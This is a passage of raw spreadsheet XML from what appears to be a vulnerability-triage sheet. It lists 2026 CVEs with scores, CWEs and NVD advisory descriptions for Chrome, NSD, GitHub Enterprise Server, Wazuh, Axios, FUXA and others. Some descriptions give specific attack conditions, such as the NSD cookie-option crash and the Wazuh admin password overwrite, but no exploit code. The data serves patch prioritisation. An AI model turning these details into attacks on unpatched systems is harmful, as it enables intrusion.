        <is>
          <t>CVE-2026-87639</t>
        </is>
      </c>
      <c r="C1704" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1704" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1704" s="5" t="inlineStr"/>
      <c r="F1704" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1704" s="5" t="inlineStr"/>
      <c r="H1704" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1704" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1704" s="5" t="inlineStr"/>
      <c r="K1704" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1704" s="5" t="inlineStr">
        <is>
          <t>Use after free in WebPackaging in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1704" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87639</t>
        </is>
      </c>
    </row>
    <row r="1705">
      <c r="A1705" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1705" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87644</t>
        </is>
      </c>
      <c r="C1705" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1705" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1705" s="5" t="inlineStr"/>
      <c r="F1705" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1705" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1705" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I1705" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1705" s="5" t="inlineStr"/>
      <c r="K1705" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1705" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization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M1705" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87644</t>
        </is>
      </c>
    </row>
    <row r="1706">
      <c r="A1706" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1706" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87648</t>
        </is>
      </c>
      <c r="C1706" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1706" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1706" s="5" t="inlineStr"/>
      <c r="F1706" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1706" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1706" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I1706" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1706" s="5" t="inlineStr"/>
      <c r="K1706" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1706" s="5" t="inlineStr">
        <is>
          <t>Use after free in ANGLE in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1706" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87648</t>
        </is>
      </c>
    </row>
    <row r="1707">
      <c r="A1707" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1707" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88883</t>
        </is>
      </c>
      <c r="C1707" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1707" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1707" s="5" t="inlineStr"/>
      <c r="F1707" s="5" t="inlineStr"/>
      <c r="G1707" s="5" t="inlineStr"/>
      <c r="H1707" s="5" t="inlineStr"/>
      <c r="I1707" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1707" s="5" t="inlineStr"/>
      <c r="K1707" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L1707" s="5" t="inlineStr">
        <is>
          <t>Renovate is an automated dependency update tool. In versions before 44.14.4 (and Mend Renovate CE/EE images before 15.4.0 and the mend-renovate-enterprise-edition Helm chart before 10.4.0), log sanitisation for TLS private keys used for Mutual TLS was incomplete. While the value of hostRules[].httpsPrivateKey was redacted in the field itself, the same private key value was not redacted if it also appeared elsewhere — for example in another configuration option or in a log message under a key other than httpsPrivateKey — causing the full private key to be written to Renovate's logs in cleartext. This affects deployments that configure Mutual TLS through hostRules[].httpsPrivateKey without passing the value through the documented `secrets` configuration. Anyone able to read the resulting logs can recover the private key. The issue is fixed in Renovate 44.14.4, which redacts any value supplied as hostRules[].httpsPrivateKey wherever it appears in the logs; as a workaround, supply the key via the `secrets` configuration.</t>
        </is>
      </c>
      <c r="M1707" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88883</t>
        </is>
      </c>
    </row>
    <row r="1708">
      <c r="A1708" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1708" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12855</t>
        </is>
      </c>
      <c r="C1708" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1708" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1708" s="5" t="inlineStr"/>
      <c r="F1708" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1708" s="5" t="inlineStr"/>
      <c r="H1708" s="5" t="inlineStr"/>
      <c r="I1708" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1708" s="5" t="inlineStr"/>
      <c r="K1708" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1708" s="5" t="inlineStr">
        <is>
          <t>Unvalidated memory boundary could result in arbitrary code execution. The vulnerability exists in the code developed specifically for HP projects.</t>
        </is>
      </c>
      <c r="M1708" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12855</t>
        </is>
      </c>
    </row>
    <row r="1709">
      <c r="A1709" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1709" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18664</t>
        </is>
      </c>
      <c r="C1709" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1709" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1709" s="5" t="inlineStr"/>
      <c r="F1709" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1709" s="5" t="inlineStr"/>
      <c r="H1709" s="5" t="inlineStr">
        <is>
          <t>nlnetlabs:nsd</t>
        </is>
      </c>
      <c r="I1709" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1709" s="5" t="inlineStr"/>
      <c r="K1709" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-697</t>
        </is>
      </c>
      <c r="L1709" s="5" t="inlineStr">
        <is>
          <t>When ranges are used for access control (i.e. of the form 1.2.3.4-1.2.3.25), because NSD wrongly compares the IP address with the range on little endian systems, IPs that were meant to be allowed may be denied, and, IPs that were meant to be denied access could be allowed. An IPv4 address is compared with IPv4 ranges as unsigned 32 bit numbers directly with the endianness of the host, but the values to compare are in network byte order (big-endian).  With IPv6 addresses the comparison is done in 4 times a unsigned 32 bit number comparison, again with the endianness of the host where all values are actually in network bye order.</t>
        </is>
      </c>
      <c r="M1709" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18664</t>
        </is>
      </c>
    </row>
    <row r="1710">
      <c r="A1710" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1710" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18730</t>
        </is>
      </c>
      <c r="C1710" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1710" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1710" s="5" t="inlineStr"/>
      <c r="F1710" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1710" s="5" t="inlineStr"/>
      <c r="H1710" s="5" t="inlineStr">
        <is>
          <t>github:enterprise_server</t>
        </is>
      </c>
      <c r="I1710" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J1710" s="5" t="inlineStr"/>
      <c r="K1710" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1710" s="5" t="inlineStr">
        <is>
          <t>A server-side request forgery (SSRF) vulnerability was identified in GitHub Enterprise Server that allowed an unauthenticated attacker to cause the Manage API to send crafted outbound requests to an attacker-controlled host. An unauthenticated endpoint parsed an attacker-supplied cluster configuration and issued gateway-to-agent requests whose HMAC authenticated only a timestamp, not the request path or body. An attacker positioned to intercept the outbound request could capture this token and replay it against privileged management agent endpoints. High-availability deployments were not affected due to a topology restriction. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.22 and was fixed in versions 3.17.19, 3.18.13, 3.19.10, 3.20.6, and 3.21.4. This vulnerability was reported via the GitHub Bug Bounty program.</t>
        </is>
      </c>
      <c r="M1710" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18730</t>
        </is>
      </c>
    </row>
    <row r="1711">
      <c r="A1711" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1711" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19401</t>
        </is>
      </c>
      <c r="C1711" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1711" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1711" s="5" t="inlineStr"/>
      <c r="F1711" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1711" s="5" t="inlineStr"/>
      <c r="H1711" s="5" t="inlineStr">
        <is>
          <t>nlnetlabs:nsd</t>
        </is>
      </c>
      <c r="I1711" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1711" s="5" t="inlineStr"/>
      <c r="K1711" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-617</t>
        </is>
      </c>
      <c r="L1711" s="5" t="inlineStr">
        <is>
          <t>Any remote client can crash a (debugging/non-release build type) NSD serve child by sending it a special crafted message with a specially tuned number of DNS Cookie options (17 when UDP payload size is 512). By continuously crashing the serve childs, the remote client can severely hamper or, when positioned sufficiently close, deny all DNS service.</t>
        </is>
      </c>
      <c r="M1711" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19401</t>
        </is>
      </c>
    </row>
    <row r="1712">
      <c r="A1712" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1712" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19538</t>
        </is>
      </c>
      <c r="C1712" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1712" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1712" s="5" t="inlineStr"/>
      <c r="F1712" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1712" s="5" t="inlineStr"/>
      <c r="H1712" s="5" t="inlineStr">
        <is>
          <t>nlnetlabs:nsd</t>
        </is>
      </c>
      <c r="I1712" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1712" s="5" t="inlineStr"/>
      <c r="K1712" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-672</t>
        </is>
      </c>
      <c r="L1712" s="5" t="inlineStr">
        <is>
          <t>The BLOCKED access control list items that are evaluated to deny access on the the proxy protocol port can be bypassed completely when connecting over TCP or TLS and sending the query twice on connection that is kept open.</t>
        </is>
      </c>
      <c r="M1712" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19538</t>
        </is>
      </c>
    </row>
    <row r="1713">
      <c r="A1713" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1713" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-24262</t>
        </is>
      </c>
      <c r="C1713" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1713" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1713" s="5" t="inlineStr"/>
      <c r="F1713" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1713" s="5" t="inlineStr"/>
      <c r="H1713" s="5" t="inlineStr">
        <is>
          <t>nvidia:dgx_spark, nvidia:dgx_spark_uefi</t>
        </is>
      </c>
      <c r="I1713" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1713" s="5" t="inlineStr"/>
      <c r="K1713" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1713" s="5" t="inlineStr">
        <is>
          <t>NVIDIA DGX Spark contains a vulnerability in the system firmware, where a privileged attacker could be able to cause an out-of-bounds write. A successful exploit of this vulnerability may lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="M1713" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-24262</t>
        </is>
      </c>
    </row>
    <row r="1714">
      <c r="A1714" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1714" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-24263</t>
        </is>
      </c>
      <c r="C1714" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1714" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1714" s="5" t="inlineStr"/>
      <c r="F1714" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1714" s="5" t="inlineStr"/>
      <c r="H1714" s="5" t="inlineStr">
        <is>
          <t>nvidia:dgx_spark, nvidia:dgx_spark_uefi</t>
        </is>
      </c>
      <c r="I1714" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1714" s="5" t="inlineStr"/>
      <c r="K1714" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L1714" s="5" t="inlineStr">
        <is>
          <t>NVIDIA DGX Spark contains a vulnerability in the system firmware, where a privileged attacker could be able to cause a NULL pointer dereference. A successful exploit of this vulnerability may lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="M1714" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-24263</t>
        </is>
      </c>
    </row>
    <row r="1715">
      <c r="A1715" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1715" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26007</t>
        </is>
      </c>
      <c r="C1715" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1715" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1715" s="5" t="inlineStr"/>
      <c r="F1715" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1715" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1715" s="5" t="inlineStr">
        <is>
          <t>cryptography.io:cryptography</t>
        </is>
      </c>
      <c r="I1715" s="5" t="inlineStr">
        <is>
          <t>2026-02-10</t>
        </is>
      </c>
      <c r="J1715" s="5" t="inlineStr"/>
      <c r="K1715" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-354</t>
        </is>
      </c>
      <c r="L1715" s="5" t="inlineStr">
        <is>
          <t>cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. Prior to 46.0.5, the public_key_from_numbers (or EllipticCurvePublicNumbers.public_key()), EllipticCurvePublicNumbers.public_key(), load_der_public_key() and load_pem_public_key() functions do not verify that the point belongs to the expected prime-order subgroup of the curve. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor &gt; 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it's easy to forge signatures on the small subgroup. Only SECT curves are impacted by this. This vulnerability is fixed in 46.0.5.</t>
        </is>
      </c>
      <c r="M1715" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26007</t>
        </is>
      </c>
    </row>
    <row r="1716">
      <c r="A1716" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1716" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28498</t>
        </is>
      </c>
      <c r="C1716" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1716" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1716" s="5" t="inlineStr"/>
      <c r="F1716" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1716" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1716" s="5" t="inlineStr">
        <is>
          <t>authlib:authlib</t>
        </is>
      </c>
      <c r="I1716" s="5" t="inlineStr">
        <is>
          <t>2026-03-16</t>
        </is>
      </c>
      <c r="J1716" s="5" t="inlineStr"/>
      <c r="K1716" s="5" t="inlineStr">
        <is>
          <t>CWE-325, CWE-354, CWE-573</t>
        </is>
      </c>
      <c r="L1716" s="5" t="inlineStr">
        <is>
          <t>Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a library-level vulnerability was identified in the Authlib Python library concerning the validation of OpenID Connect (OIDC) ID Tokens. Specifically, the internal hash verification logic (_verify_hash) responsible for validating the at_hash (Access Token Hash) and c_hash (Authorization Code Hash) claims exhibits a fail-open behavior when encountering an unsupported or unknown cryptographic algorithm. This flaw allows an attacker to bypass mandatory integrity protections by supplying a forged ID Token with a deliberately unrecognized alg header parameter. The library intercepts the unsupported state and silently returns True (validation passed), inherently violating fundamental cryptographic design principles and direct OIDC specifications. This issue has been patched in version 1.6.9.</t>
        </is>
      </c>
      <c r="M1716" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28498</t>
        </is>
      </c>
    </row>
    <row r="1717">
      <c r="A1717" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1717" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33810</t>
        </is>
      </c>
      <c r="C1717" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1717" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1717" s="5" t="inlineStr"/>
      <c r="F1717" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1717" s="5" t="inlineStr"/>
      <c r="H1717" s="5" t="inlineStr">
        <is>
          <t>golang:go</t>
        </is>
      </c>
      <c r="I1717" s="5" t="inlineStr">
        <is>
          <t>2026-04-08</t>
        </is>
      </c>
      <c r="J1717" s="5" t="inlineStr"/>
      <c r="K1717" s="5" t="inlineStr">
        <is>
          <t>CWE-1289, CWE-295</t>
        </is>
      </c>
      <c r="L1717" s="5" t="inlineStr">
        <is>
          <t>When verifying a certificate chain containing excluded DNS constraints, these constraints are not correctly applied to wildcard DNS SANs which use a different case than the constraint. This only affects validation of otherwise trusted certificate chains, issued by a root CA in the VerifyOptions.Roots CertPool, or in the system certificate pool.</t>
        </is>
      </c>
      <c r="M1717" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33810</t>
        </is>
      </c>
    </row>
    <row r="1718">
      <c r="A1718" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1718" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41424</t>
        </is>
      </c>
      <c r="C1718" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1718" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1718" s="5" t="inlineStr"/>
      <c r="F1718" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1718" s="5" t="inlineStr"/>
      <c r="H1718" s="5" t="inlineStr"/>
      <c r="I1718" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1718" s="5" t="inlineStr"/>
      <c r="K1718" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1718" s="5" t="inlineStr">
        <is>
          <t>Wazuh is a free and open source platform used for threat prevention, detection, and response. From 4.9.0 until 4.10.4 and 4.14.6, PUT /security/users/{user_id} in api/api/controllers/security_controller.py passes request.get("user") instead of request.context['token_info']['sub'] as current_user. remove_nones_to_dict() removes the resulting None value, so the reserved-account protection in framework/wazuh/security.py cannot verify who is making the request. An authenticated user with the users_admin role can overwrite the password of protected administrator accounts with user IDs at or below 99, including the wazuh superuser, and gain full administrative control. This issue is fixed in versions 4.10.4 and 4.14.6.</t>
        </is>
      </c>
      <c r="M1718" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41424</t>
        </is>
      </c>
    </row>
    <row r="1719">
      <c r="A1719" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1719" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41604</t>
        </is>
      </c>
      <c r="C1719" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1719" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1719" s="5" t="inlineStr"/>
      <c r="F1719" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1719" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1719" s="5" t="inlineStr">
        <is>
          <t>apache:thrift</t>
        </is>
      </c>
      <c r="I1719" s="5" t="inlineStr">
        <is>
          <t>2026-04-28</t>
        </is>
      </c>
      <c r="J1719" s="5" t="inlineStr"/>
      <c r="K1719" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1719" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds Read vulnerability in Apache Thrift.
This issue affects Apache Thrift: before 0.23.0.
Users are recommended to upgrade to version 0.23.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M1719" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41604</t>
        </is>
      </c>
    </row>
    <row r="1720">
      <c r="A1720" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1720" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44487</t>
        </is>
      </c>
      <c r="C1720" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1720" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1720" s="5" t="inlineStr"/>
      <c r="F1720" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1720" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1720" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I1720" s="5" t="inlineStr">
        <is>
          <t>2026-06-11</t>
        </is>
      </c>
      <c r="J1720" s="5" t="inlineStr"/>
      <c r="K1720" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="L1720" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Prior to 0.32.0 and 1.16.0, Axios’s Node.js HTTP adapter may forward a Proxy-Authorization header to a redirected origin during specific proxy-to-direct redirect flows. This affects Node.js usage, where an initial HTTP request is sent through an authenticated HTTP proxy, redirects are followed, and the redirected URL is no longer proxied. Under affected redirect shapes, the final origin can receive the proxy credential that was intended only for the outbound proxy. This vulnerability is fixed in 0.32.0 and 1.16.0.</t>
        </is>
      </c>
      <c r="M1720" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44487</t>
        </is>
      </c>
    </row>
    <row r="1721">
      <c r="A1721" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1721" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44506</t>
        </is>
      </c>
      <c r="C1721" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1721" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1721" s="5" t="inlineStr"/>
      <c r="F1721" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1721" s="5" t="inlineStr"/>
      <c r="H1721" s="5" t="inlineStr"/>
      <c r="I1721" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1721" s="5" t="inlineStr"/>
      <c r="K1721" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L1721" s="5" t="inlineStr">
        <is>
          <t>Medplum is a developer platform that enables development of healthcare apps. In Medplum versions 4.1.10 through 5.1.6, the /oauth2/register endpoint could return the client_secret of preconfigured OAuth clients defined via the defaultOAuthClients server configuration when a matching redirect_uri was provided. This issue has been patched in version 5.1.7.</t>
        </is>
      </c>
      <c r="M1721" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44506</t>
        </is>
      </c>
    </row>
    <row r="1722">
      <c r="A1722" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1722" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47626</t>
        </is>
      </c>
      <c r="C1722" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1722" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1722" s="5" t="inlineStr"/>
      <c r="F1722" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1722" s="5" t="inlineStr"/>
      <c r="H1722" s="5" t="inlineStr">
        <is>
          <t>nvidia:dgx_spark, nvidia:dgx_spark_uefi</t>
        </is>
      </c>
      <c r="I1722" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1722" s="5" t="inlineStr"/>
      <c r="K1722" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L1722" s="5" t="inlineStr">
        <is>
          <t>NVIDIA DGX Spark contains a vulnerability in the system firmware, where a privileged attacker could be able to cause an out-of-bounds write. A successful exploit of this vulnerability may lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="M1722" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47626</t>
        </is>
      </c>
    </row>
    <row r="1723">
      <c r="A1723" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1723" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47719</t>
        </is>
      </c>
      <c r="C1723" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1723" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1723" s="5" t="inlineStr"/>
      <c r="F1723" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1723" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H1723" s="5" t="inlineStr"/>
      <c r="I1723" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1723" s="5" t="inlineStr"/>
      <c r="K1723" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1723" s="5" t="inlineStr">
        <is>
          <t>FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. Prior to 1.3.2, the DEVICE_WEBAPI_REQUEST and DEVICE_PROPERTY Socket.IO handlers in server/runtime/index.js omit isSocketWriteAuthorized and accept attacker-controlled property.address or endpoint connection data. A remote unauthenticated attacker can make server/runtime/devices/httprequest/index.js call axios.get against arbitrary HTTP or HTTPS destinations, connect to reachable OPC UA or ODBC services, and receive results through the corresponding Socket.IO event. This read SSRF oracle can expose cloud instance metadata, internal administrative services, industrial endpoints, and ODBC data reachable from the FUXA host, including when secureEnabled is true. This issue is fixed in version 1.3.2.</t>
        </is>
      </c>
      <c r="M1723" s="6" t="inlineStr">
        <is>
